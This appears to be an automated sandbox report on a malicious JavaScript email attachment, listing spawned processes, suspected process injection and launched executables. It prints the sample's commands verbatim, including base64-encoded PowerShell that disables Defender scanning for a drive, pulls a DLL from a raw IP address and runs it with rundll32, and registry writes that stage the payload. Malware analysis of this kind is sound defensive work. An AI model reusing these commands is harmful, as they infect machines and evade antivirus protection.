"jabvag4adwbha$spinulososerratehendecane"

One or more non-whitelisted processes were created (12 events)

parent_process	powershell.exe	martian_process	"C:\Windows\system32\rundll32.exe" C:\Users\test22\AppData\Local\Temp\\overvaultUnheroize.dll RS32
parent_process	powershell.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle Minimized -encodedcommand JABVAG4AdwBhAHIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAGIAcgBvAG0AZQBsAGkAYQBjAGUAbwB1AHMAIAB8ACAAJQB7ACQAXwAuAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AfQA7ACAAJABVAG4AdwBhAHIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIAAiAEMAaQBsAGkAZQBsAGwAYQAiACAAKwAgACQAVQBuAHcAYQByAHAAZQBkAEkAcgBvAG4AdwBvAHIAawBlAHIAOwAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AGYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFUAbgB3AGEAcgBwAGUAZABJAHIAbwBuAHcAbwByAGsAZQByACkAKQA7ACAAWwBjAGwAYQBzAHMAaQBjAHkAYwAxAF0AOgA6AEUAeABlAGMAdQB0AGUAKAAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAeABlAGMAdQB0AGkAbwBuAHAAbwBsAGkAYwB5ACAAYgB5AHAAYQBzAHMAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAAIgAiAGAAJABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIABgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AYAApAC4ARAByAGkAdgBlAC4ATgBhAG0AZQAgACsAIAAnADoAXAAnADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlADsAcgBlAGcAIABkAGUAbABlAHQAZQAgAEgASwBFAFkAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACAALwB2ACAAVQBzAGUAcgBpAG4AaQB0ACAALwBmADsAIAByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwAYgByAG8AbQBlAGwAaQBhAGMAZQBvAHUAcwAgAC8AdgAgAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AIAAvAGYAIgAiACIAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAOgAvAC8AMQAzADQALgAyADAAOQAuADIAMQA2AC4AMQA2ADMALwBxAEkANAA2AG4AMQBOAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABvAHYAZQByAHYAYQB1AGwAdABVAG4AaABlAHIAbwBpAHoAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAbwB2AGUAcgB2AGEAdQBsAHQAVQBuAGgAZQByAG8AaQB6AGUALgBkAGwAbAAsAFIAUwAzADIAOwA=
parent_process	wscript.exe	martian_process	"C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\SpinulososerrateHendecane /v Wordcraftsman /d HIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAGIAcgBvAG0AZQBsAGkAYQBjAGUAbwB1AHMAIAB8ACAAJQB7ACQAXwAuAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AfQA7ACAAJABVAG4AdwBhAHIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIAAiAEMAaQBsAGkAZQBsAGwAYQAiACAAKwAgACQAVQBuAHcAYQByAHAAZQBkAEkAcgBvAG4AdwBvAHIAawBlAHIAOwAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AGYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFUAbgB3AGEAcgBwAGUAZABJAHIAbwBuAHcAbwByAGsAZQByACkAKQA7ACAAWwBjAGwAYQBzAHMAaQBjAHkAYwAxAF0AOgA6AEUAeABlAGMAdQB0AGUAKAAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAeABlAGMAdQB0AGkAbwBuAHAAbwBsAGkAYwB5ACAAYgB5AHAAYQBzAHMAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAAIgAiAGAAJABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIABgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AYAApAC4ARAByAGkAdgBlAC4ATgBhAG0AZQAgACsAIAAnADoAXAAnADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlADsAcgBlAGcAIABkAGUAbABlAHQAZQAgAEgASwBFAFkAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACAALwB2ACAAVQBzAGUAcgBpAG4AaQB0ACAALwBmADsAIAByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwAYgByAG8AbQBlAGwAaQBhAGMAZQBvAHUAcwAgAC8AdgAgAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AIAAvAGYAIgAiACIAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAOgAvAC8AMQAzADQALgAyADAAOQAuADIAMQA2AC4AMQA2ADMALwBxAEkANAA2AG4AMQBOAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABvAHYAZQByAHYAYQB1AGwAdABVAG4AaABlAHIAbwBpAHoAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAbwB2AGUAcgB2AGEAdQBsAHQAVQBuAGgAZQByAG8AaQB6AGUALgBkAGwAbAAsAFIAUwAzADIAOwA=
parent_process	wscript.exe	martian_process	reg add HKCU\SOFTWARE\SpinulososerrateHendecane /v jivaro /d xmgGYAasmzRzvhBgZxPERTsCDGMgFMwYSOXlaRHLTwjMmIyXtzjckuSbSddSeZJsiHFAjuIaZbaNkFoSDAnSoxKINkRETskowDXLwQFuibrZKxFhqQFNkznHBzSwDpFacSTDnLVAufEzdRTaDQLIzVjstWkovLEChroVhTEACCcjEdazHuOyDvpXITrenUzzqEpsWlzDxhjKycYgvxnIGVObMdBkADbUUludHBVUaYKLoyQZWhmiYukuivFtbrLIenVSzVNRbgqFkckxMwtlMJAmpLSnGiipLPJkrBjzNnurfPVhwwLbZpDtvVrIriZVswIzcZtLwbqDzArZhkyfmJzkKAddTwTQdpljIhROfEJQkelmHdEKNZWmzOAVFRcfi
parent_process	wscript.exe	martian_process	reg add HKCU\SOFTWARE\bromeliaceous /v abulic /d kgmObQADIWevfLNAfnmOmDlagwAZOlxjSZdinjhaXLABefEwvtKeIgOWbRYjjnNLnPWBwSdswnqJVimKkYMKXkZLdwzLdIrSljrUPrNdxlACLpHRTMaOdMiyqLvFcKTufWdxxZsWUfHatHtakcMXApnEHGDSrMxktEJewtTTmxxcaHtnXvZEUoYzdZanJXFqmjbBcHHiQIDivZzgZnZQtyyuEMlucRACncNcpXbiAlFIVyRpIjdnIVSDZNkgtMPZOtdVWOWTEsEPJAXWzheuLnoDjhMgfYYDKPTsRSrQUkzbFvpubBHQcgTrTGYlTygfgbdGISAqsxBzaBVZJBdbxaDjJddFWzRVBtQnENJohQENBTZxkceaLaSwWNKTibOjWCWFCiTnmgbDocGPRtQIAroxcjocolsmVT
parent_process	wscript.exe	martian_process	"C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\SpinulososerrateHendecane /v jivaro /d xmgGYAasmzRzvhBgZxPERTsCDGMgFMwYSOXlaRHLTwjMmIyXtzjckuSbSddSeZJsiHFAjuIaZbaNkFoSDAnSoxKINkRETskowDXLwQFuibrZKxFhqQFNkznHBzSwDpFacSTDnLVAufEzdRTaDQLIzVjstWkovLEChroVhTEACCcjEdazHuOyDvpXITrenUzzqEpsWlzDxhjKycYgvxnIGVObMdBkADbUUludHBVUaYKLoyQZWhmiYukuivFtbrLIenVSzVNRbgqFkckxMwtlMJAmpLSnGiipLPJkrBjzNnurfPVhwwLbZpDtvVrIriZVswIzcZtLwbqDzArZhkyfmJzkKAddTwTQdpljIhROfEJQkelmHdEKNZWmzOAVFRcfi
parent_process	wscript.exe	martian_process	reg add HKCU\SOFTWARE\SpinulososerrateHendecane /v insoucianceReptiles /d CMehXJuhGNWqofrszZJBgFTZWWtbsqabyvfrnONLCGBNEwJsUjlxUBnBhlxSQiQmDQlXsRNaWlOueEbMDtlMLnEJwfwYhfMhVMsSZpFnrXXkhLRUAxbKIGmulpCQKUXPWveXByzNBWpXQcMXaVJxSxFrmIIFjqXjMDnjtXeINBcuPQBZHOnavVjdnXcJeRsQCDbLIiTdyxcUHCtJLKjqbBUGWbtVvCZElpzOPMzqMwAJegkxhqXAcCTppAGLwqJycKpQlRMbfyjuODGCNBCJtxNbkHgnkEnMbOJgkEmnLWSikddXgBBBvZhUtxZholOCyVjbYaeiNKKlCyLCzwNhdFDjRDJVcAnSSdPtftBtnThbS
parent_process	wscript.exe	martian_process	reg add HKCU\SOFTWARE\SpinulososerrateHendecane /v Wordcraftsman /d HIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIABHAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAASABLAEMAVQA6AFwAXABTAE8ARgBUAFcAQQBSAEUAXABcAGIAcgBvAG0AZQBsAGkAYQBjAGUAbwB1AHMAIAB8ACAAJQB7ACQAXwAuAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AfQA7ACAAJABVAG4AdwBhAHIAcABlAGQASQByAG8AbgB3AG8AcgBrAGUAcgAgAD0AIAAiAEMAaQBsAGkAZQBsAGwAYQAiACAAKwAgACQAVQBuAHcAYQByAHAAZQBkAEkAcgBvAG4AdwBvAHIAawBlAHIAOwAgAFsAUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAWwBDAG8AbgB2AGUAcgB0AF0AOgA6AGYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAFUAbgB3AGEAcgBwAGUAZABJAHIAbwBuAHcAbwByAGsAZQByACkAKQA7ACAAWwBjAGwAYQBzAHMAaQBjAHkAYwAxAF0AOgA6AEUAeABlAGMAdQB0AGUAKAAiAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAtAGUAeABlAGMAdQB0AGkAbwBuAHAAbwBsAGkAYwB5ACAAYgB5AHAAYQBzAHMAIAAtAHcAaQBuAGQAbwB3AHMAdAB5AGwAZQAgAGgAaQBkAGQAZQBuACAAIgAiAGAAJABjAHUAcgByAGUAbgB0AEQAcgBpAHYAZQAgAD0AIABgACgAZwBlAHQALQBsAG8AYwBhAHQAaQBvAG4AYAApAC4ARAByAGkAdgBlAC4ATgBhAG0AZQAgACsAIAAnADoAXAAnADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAYAAkAGMAdQByAHIAZQBuAHQARAByAGkAdgBlADsAcgBlAGcAIABkAGUAbABlAHQAZQAgAEgASwBFAFkAXwBDAFUAUgBSAEUATgBUAF8AVQBTAEUAUgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACAALwB2ACAAVQBzAGUAcgBpAG4AaQB0ACAALwBmADsAIAByAGUAZwAgAGQAZQBsAGUAdABlACAASABLAEUAWQBfAEMAVQBSAFIARQBOAFQAXwBVAFMARQBSAFwAUwBPAEYAVABXAEEAUgBFAFwAYgByAG8AbQBlAGwAaQBhAGMAZQBvAHUAcwAgAC8AdgAgAFcAbwByAGQAYwByAGEAZgB0AHMAbQBhAG4AIAAvAGYAIgAiACIAKQA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAGgAdAB0AHAAOgAvAC8AMQAzADQALgAyADAAOQAuADIAMQA2AC4AMQA2ADMALwBxAEkANAA2AG4AMQBOAC8AMAAzACAALQBPACAAJABlAG4AdgA6AFQARQBNAFAAXABvAHYAZQByAHYAYQB1AGwAdABVAG4AaABlAHIAbwBpAHoAZQAuAGQAbABsADsAIAByAHUAbgBkAGwAbAAzADIAIAAkAGUAbgB2ADoAVABFAE0AUABcAFwAbwB2AGUAcgB2AGEAdQBsAHQAVQBuAGgAZQByAG8AaQB6AGUALgBkAGwAbAAsAFIAUwAzADIAOwA=
parent_process	wscript.exe	martian_process	"C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\SpinulososerrateHendecane /v insoucianceReptiles /d CMehXJuhGNWqofrszZJBgFTZWWtbsqabyvfrnONLCGBNEwJsUjlxUBnBhlxSQiQmDQlXsRNaWlOueEbMDtlMLnEJwfwYhfMhVMsSZpFnrXXkhLRUAxbKIGmulpCQKUXPWveXByzNBWpXQcMXaVJxSxFrmIIFjqXjMDnjtXeINBcuPQBZHOnavVjdnXcJeRsQCDbLIiTdyxcUHCtJLKjqbBUGWbtVvCZElpzOPMzqMwAJegkxhqXAcCTppAGLwqJycKpQlRMbfyjuODGCNBCJtxNbkHgnkEnMbOJgkEmnLWSikddXgBBBvZhUtxZholOCyVjbYaeiNKKlCyLCzwNhdFDjRDJVcAnSSdPtftBtnThbS
parent_process	wscript.exe	martian_process	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $SpinulososerrateHendecane = Get-ItemProperty -Path HKCU:\SOFTWARE\SpinulososerrateHendecane \| %{$_.Wordcraftsman}; powershell -windowstyle Minimized -encodedcommand "JABVAG4AdwBhA$SpinulososerrateHendecane"
parent_process	wscript.exe	martian_process	"C:\Windows\System32\reg.exe" add HKCU\SOFTWARE\bromeliaceous /v abulic /d kgmObQADIWevfLNAfnmOmDlagwAZOlxjSZdinjhaXLABefEwvtKeIgOWbRYjjnNLnPWBwSdswnqJVimKkYMKXkZLdwzLdIrSljrUPrNdxlACLpHRTMaOdMiyqLvFcKTufWdxxZsWUfHatHtakcMXApnEHGDSrMxktEJewtTTmxxcaHtnXvZEUoYzdZanJXFqmjbBcHHiQIDivZzgZnZQtyyuEMlucRACncNcpXbiAlFIVyRpIjdnIVSDZNkgtMPZOtdVWOWTEsEPJAXWzheuLnoDjhMgfYYDKPTsRSrQUkzbFvpubBHQcgTrTGYlTygfgbdGISAqsxBzaBVZJBdbxaDjJddFWzRVBtQnENJohQENBTZxkceaLaSwWNKTibOjWCWFCiTnmgbDocGPRtQIAroxcjocolsmVT
parent_process	wscript.exe	martian_process	powershell $SpinulososerrateHendecane = Get-ItemProperty -Path HKCU:\SOFTWARE\SpinulososerrateHendecane \| %{$_.Wordcraftsman}; powershell -windowstyle Minimized -encodedcommand "JABVAG4AdwBhA$SpinulososerrateHendecane"

Resumed a suspended thread in a remote process potentially indicative of process injection (10 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3044 resumed a thread in remote process 1632
Process injection	Process 3044 resumed a thread in remote process 1324
Process injection	Process 3044 resumed a thread in remote process 1392
Process injection	Process 3044 resumed a thread in remote process 2656
Process injection	Process 3044 resumed a thread in remote process 2820
NtResumeThread March 7, 2023, 9:58 a.m.	thread_handle: 0x00000374 suspend_count: 1 process_identifier: 1632	1	0	0
NtResumeThread March 7, 2023, 9:58 a.m.	thread_handle: 0x000002e4 suspend_count: 1 process_identifier: 1324	1	0	0
NtResumeThread March 7, 2023, 9:58 a.m.	thread_handle: 0x000002f4 suspend_count: 1 process_identifier: 1392	1	0	0
NtResumeThread March 7, 2023, 9:58 a.m.	thread_handle: 0x000002e4 suspend_count: 1 process_identifier: 2656	1	0	0
NtResumeThread March 7, 2023, 9:58 a.m.	thread_handle: 0x000002f4 suspend_count: 1 process_identifier: 2820	1	0	0

The processes wscript.exe, powershell.exe wrote an executable file to disk which it then attempted to execute (22 events)

file	C:\Windows\System32\reg.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe
file	C:\Windows\System32\rundll32.exe

Attachment-Cc(731).js

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All